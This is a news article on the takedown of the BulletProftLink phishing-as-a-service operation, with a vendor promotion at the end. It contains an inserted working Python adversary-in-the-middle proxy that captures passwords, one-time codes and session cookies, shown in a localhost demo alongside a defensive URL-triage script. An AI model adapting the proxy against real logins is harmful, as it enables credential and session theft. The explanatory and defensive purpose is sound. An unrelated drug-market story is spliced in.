
BulletProftLink Phishing-as-a-Service (PhaaS) Group Taken Down by Malaysian Law Enforcement

The BulletProftLink phishing-as-a-service (PhaaS) operation has been taken down by the Royal Malaysia Police. The action resulted in the seizure and shutdown of several domains affiliated with the cybercriminal network.

Dismantling the network is a significant step in the fight against cybercrime and shows what international cooperation can achieve in protecting users from phishing attacks.

The operation, which began in 2015, initially went unnoticed by researchers but gained popularity in 2018. It grew increasingly active as it attracted thousands of customers, some of whom paid for access to logs of stolen credentials.

PhaaS platforms supply attackers with ready-made kits and page templates, lowering the skill needed to run a phishing campaign. The services typically bundle reverse proxying, credential harvesting, page hosting and customisation in a single subscription, so the customer's main job is to get victims to click the link.

Security researcher Gabor Szathmari first documented the BulletProftLink operation in 2020, linking the service's operator to an individual in Malaysia.

In September 2021, Microsoft researchers reported on the platform's role in large-scale phishing and its growing catalogue of downloadable templates. They also found that the service had 1,618 subscribers, and that its operators kept copies of the credentials those subscribers stole in their own phishing attacks.

On November 6, 2023, the Royal Malaysia Police, working with the Australian Federal Police (AFP) and the U.S. Federal Bureau of Investigation (FBI), carried out the operation. The joint effort was led from Malaysia because analysis had shown that the actors running the platform were operating from inside the country.

According to the New Straits Times, eight people aged 29 to 56, including the syndicate's mastermind, were arrested in Sabah, Selangor, Perak and Kuala Lumpur. Authorities also seized servers, laptops, jewellery, vehicles and bitcoin wallets worth over $213,000.

After seizing the servers, law enforcement began an investigation to identify the platform's users. Notably, some customers were paying a premium subscription of $2,000 per month for exclusive access to a regular feed of stolen credentials.

According to cybercrime intelligence firm Intel 471, BulletProftLink, also known as BulletProofLink, had 8,138 active members, who could choose from 327 phishing page templates.

[Image: Active users stats for the BulletProftLink dashboard (Intel 471)]

That is a 403% increase in two years over the 1,618 subscribers Microsoft counted in its 2021 report, and a measure of how widely the platform was used across the cybercrime ecosystem.

Intel 471 added in a statement:

BulletProftLink is associated with the threat actor AnthraxBP who also went by the online nicknames TheGreenMY and AnthraxLinkers. The actor maintained an active website advertising phishing services. The actor has an extensive underground footprint and operated on a number of clear web underground forums and Telegram channels using multiple handles.

Intel 471 reports that the BulletProftLink templates available before the takedown included fake login pages for widely trusted services such as Microsoft Office, DHL and Naver, a South Korean online platform. The templates also targeted financial institutions including Bank of America, American Express, Consumer Credit Union and Royal Bank of Canada.

[Image: BulletProftLink website offering phishing pages for sale (Intel 471)]

Some of the phishing URLs observed were hosted on trusted cloud services such as Google Cloud and Microsoft Azure. Because the parent domain has a good reputation, such links can pass the domain-reputation checks that email security tools rely on; the content served under an attacker-controlled tenant, bucket or app name still has to be judged on its own merits.
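As an added example (it is not part of the original article and not any vendor's tooling), the Python check below shows why a trusted parent domain is not enough on its own: it isolates the attacker-registerable tenant label under a few well-known cloud hosting suffixes and looks there, and in the path, for brand-impersonation and credential-capture cues. The suffix list, the token lists and the sample URLs are constructed assumptions, not observed BulletProftLink infrastructure.

```python
# Triage of URLs hosted under a trusted cloud parent domain. Added example, not from
# the article or any vendor; the suffix list, token lists and sample URLs are assumptions.
from urllib.parse import urlparse

# Parent domains under which any customer can publish content (illustrative, not complete).
TENANT_SUFFIXES = (
    ".blob.core.windows.net",  # Azure Blob Storage
    ".web.core.windows.net",   # Azure Storage static websites
    ".azurewebsites.net",      # Azure App Service
    ".appspot.com",            # Google App Engine
    ".web.app",                # Firebase Hosting
)
# Hosts where the tenant is the first path segment rather than a subdomain label.
PATH_TENANT_HOSTS = ("storage.googleapis.com",)
BRAND_TOKENS = ("microsoft", "office", "outlook", "dhl", "naver", "bankofamerica", "amex", "rbc")
LOGIN_TOKENS = ("login", "signin", "sign-in", "auth", "verify", "password", "secure")


def triage_url(url):
    """Classify a URL as not-tenant-cloud, review or suspect, with the reasons."""
    parts = urlparse(url)
    host, path, query = (parts.hostname or ""), parts.path.lower(), parts.query.lower()
    tenant = parent = None
    for suffix in TENANT_SUFFIXES:
        if host.endswith(suffix) and len(host) > len(suffix):
            tenant, parent = host[: -len(suffix)], suffix.lstrip(".")
    if host in PATH_TENANT_HOSTS:
        tenant, parent = path.strip("/").split("/")[0], host
    finding = {"url": url, "parent": parent, "tenant": tenant, "brands": [], "cues": [], "reasons": []}
    if parent is None:
        finding["verdict"] = "not-tenant-cloud"  # host reputation is meaningful here
        return finding
    # The parent domain's reputation says nothing about what the tenant serves, so look
    # at the attacker-chosen label and the path for impersonation and credential cues.
    haystack = " ".join((tenant, path, query))
    finding["brands"] = [b for b in BRAND_TOKENS if b in haystack]
    finding["cues"] = [t for t in LOGIN_TOKENS if t in haystack]
    finding["reasons"].append(f"{parent} is trusted but '{tenant}' is tenant-controlled content")
    if finding["brands"]:
        finding["reasons"].append("brand tokens: " + ", ".join(finding["brands"]))
    if finding["cues"]:
        finding["reasons"].append("credential-capture cues: " + ", ".join(finding["cues"]))
    finding["verdict"] = "suspect" if finding["brands"] or finding["cues"] else "review"
    return finding


if __name__ == "__main__":
    for sample in (  # constructed samples, not observed BulletProftLink URLs
        "https://office365-verify.blob.core.windows.net/$web/login.html",
        "https://storage.googleapis.com/dhl-parcel-auth/index.html",
        "https://acme-reports.web.app/q3.pdf",
        "https://www.microsoft.com/en-us",
    ):
        f = triage_url(sample)
        print(f["verdict"], sample, "; ".join(f["reasons"]))
```

The output is meant as enrichment for a mail gateway or SOAR rule, not a block decision on its own: "review" means the link points at tenant-controlled content under a trusted parent with no further cues, "suspect" means the tenant label or path also impersonates a brand or advertises a login. Extend TENANT_SUFFIXES with the platforms that show up in your own telemetry.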

BulletProftLink's arsenal also includes the Evilginx2 reverse-proxy tool, which enables adversary-in-the-middle (AiTM) phishing. The proxy sits between the victim and the genuine login page and relays the whole sign-in, so the victim completes the password and MFA challenge normally while the proxy records the credentials and, more importantly, the authenticated session cookie issued afterwards. That defeats MFA methods which are not bound to the site the user is actually visiting (one-time codes, SMS codes, push approvals); origin-bound methods such as FIDO2/WebAuthn security keys and passkeys are not bypassed this way.
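As an added example of the reverse-proxy component that such kits bundle (it is not Evilginx2 or BulletProftLink code; both servers below are toy stand-ins listening on 127.0.0.1), the Python script runs a minimal AiTM proxy in front of a toy identity provider. A simulated victim signs in through the proxy with password and TOTP; the proxy relays the exchange and keeps the credentials and the session cookie. A second sign-in with a WebAuthn-style assertion, which carries the origin the browser actually saw, is refused by the IdP because that origin is the phishing host. The handler names, the user "alice", the fixed SESSION_TOKEN and the JSON request shapes are assumptions made for the demo.

```python
# Toy adversary-in-the-middle (AiTM) proxy in front of a toy identity provider. Added
# example, not Evilginx2 or BulletProftLink code; names, user and token are assumptions.
import http.server
import json
import threading
import urllib.error
import urllib.request

IDP_USERS = {"alice": {"password": "correct horse", "totp": "492813"}}  # constructed
SESSION_TOKEN = "sess-7f3a9c"  # a real IdP mints a random token per login
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore env proxies

def post(url, body, headers):
    """POST raw bytes and return the response object even for 4xx/5xx."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        return OPENER.open(req, timeout=5)
    except urllib.error.HTTPError as err:
        return err

def reply(handler, code, data, cookies=(), ctype="application/json"):
    handler.send_response(code)
    handler.send_header("Content-Type", ctype)
    handler.send_header("Content-Length", str(len(data)))
    for c in cookies:
        handler.send_header("Set-Cookie", c)
    handler.end_headers()
    handler.wfile.write(data)

class IdPHandler(http.server.BaseHTTPRequestHandler):
    """Toy IdP: a password+TOTP login and a WebAuthn-style origin-bound login."""
    rp_origin = ""  # the IdP's own origin, set in run_demo
    log_message = lambda *args: None  # keep the demo quiet

    def do_POST(self):
        req = json.loads(self.rfile.read(int(self.headers.get("Content-Length", 0))) or b"{}")
        user = IDP_USERS.get(req.get("user"))
        session = [f"session={SESSION_TOKEN}; Path=/; HttpOnly"]
        if self.path == "/login":
            # TOTP has no origin binding: a relayed password+code looks like a genuine login.
            if user and (req.get("password"), req.get("totp")) == (user["password"], user["totp"]):
                return reply(self, 200, b'{"ok": true}', session)
            return reply(self, 401, b'{"ok": false}')
        if self.path == "/webauthn":
            # WebAuthn signs the browser's actual origin into clientDataJSON; the RP checks it.
            if user and req.get("origin") == self.rp_origin:
                return reply(self, 200, b'{"ok": true}', session)
            return reply(self, 403, b'{"ok": false, "reason": "origin mismatch"}')
        reply(self, 404, b'{"ok": false}')

class AitmProxy(http.server.BaseHTTPRequestHandler):
    """Relays each request to the real IdP, which only ever sees the proxy."""
    upstream = ""   # real IdP origin, set in run_demo
    captured = []   # what the phishing operator gets to keep
    log_message = lambda *args: None

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        # Drop hop-by-hop headers; urllib recomputes Host and Content-Length.
        fwd = {k: v for k, v in self.headers.items()
               if k.lower() not in ("host", "content-length", "connection")}
        resp = post(self.upstream + self.path, body, fwd)
        data, cookies = resp.read(), resp.headers.get_all("Set-Cookie") or []
        # Credentials travel in the request, the session cookie in the reply.
        self.captured.append({"path": self.path, "body": body.decode(), "set_cookie": cookies})
        # Relay the reply unchanged; the cookies are re-issued under the phishing host.
        reply(self, resp.getcode(), data, cookies, resp.headers.get("Content-Type", "text/plain"))

def start_server(handler):
    srv = http.server.HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"

def post_json(url, payload):
    resp = post(url, json.dumps(payload).encode(), {"Content-Type": "application/json"})
    return resp.getcode(), json.loads(resp.read() or b"{}")

def run_demo():
    """The victim signs in through the proxy with password+TOTP, then WebAuthn-style."""
    idp, idp_origin = start_server(IdPHandler)
    IdPHandler.rp_origin = AitmProxy.upstream = idp_origin
    AitmProxy.captured = []
    proxy, phish_origin = start_server(AitmProxy)
    try:
        login_status, _ = post_json(phish_origin + "/login",
                                    {"user": "alice", "password": "correct horse", "totp": "492813"})
        # The browser binds the assertion to the origin it sees, i.e. the phishing host.
        wa_status, wa_body = post_json(phish_origin + "/webauthn", {"user": "alice", "origin": phish_origin})
    finally:
        for srv in (proxy, idp):
            srv.shutdown()
            srv.server_close()
    stolen = json.loads(AitmProxy.captured[0]["body"])
    session = next((c.split(";")[0].split("=", 1)[1] for rec in AitmProxy.captured
                    for c in rec["set_cookie"] if c.startswith("session=")), None)
    return {"victim_saw_login_ok": login_status == 200, "stolen_password": stolen["password"],
            "stolen_totp": stolen["totp"], "stolen_session": session,
            "webauthn_status": wa_status, "webauthn_reason": wa_body.get("reason")}

if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

The result dictionary is the operator's view: the victim saw a successful login, the password and the one-time code were captured, and the session cookie can be replayed against the IdP without any further MFA. The WebAuthn-style attempt fails with 403 because the signed origin names the proxy rather than the relying party; that is the property that makes FIDO2/WebAuthn "phishing-resistant", and it is why a session-cookie capture, not a password capture, is what an AiTM detection should look for (for example, the same session cookie used from a second IP or client fingerprint shortly after issue).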

Threat actors keep adjusting their techniques in response to disruption, as the evolution of AiTM attacks shows. Notably, such campaigns increasingly use intermediate URLs placed inside documents posted on file-sharing services such as DRACOON: the document, rather than the email itself, carries the link to the attacker's malicious content, so the email contains only a link to a legitimate service.

In a separate case, Milomir Desnica, a 33-year-old man of Serbian and Croatian descent, has pleaded guilty in the United States to running the Monopoly Market dark web drug marketplace. He admitted to conspiring to distribute more than 30 kilogrammes of methamphetamine to customers in the United States.

Desnica created the marketplace in 2019 and ran it until December 2021, when a coordinated operation by authorities in Finland, Germany and the United States took the platform down.

Desnica was arrested in Austria in November 2022 and later extradited to the U.S. on drug-trafficking charges. The closure of this illegal marketplace is another example of what international cooperation can achieve against online crime.

Phishing attacks are on the rise, and protecting your organisation matters. One effective measure is raising user awareness of these attacks. Phishing Tackle can help with that: they offer a free 14-day trial to train your users to recognise and avoid phishing emails.

Technology helps, but it cannot catch 100% of phishing emails, so user education is important to minimising the impact of the attacks that get through. Consulting Phishing Tackle can provide valuable insights and tools to strengthen your defences against phishing.
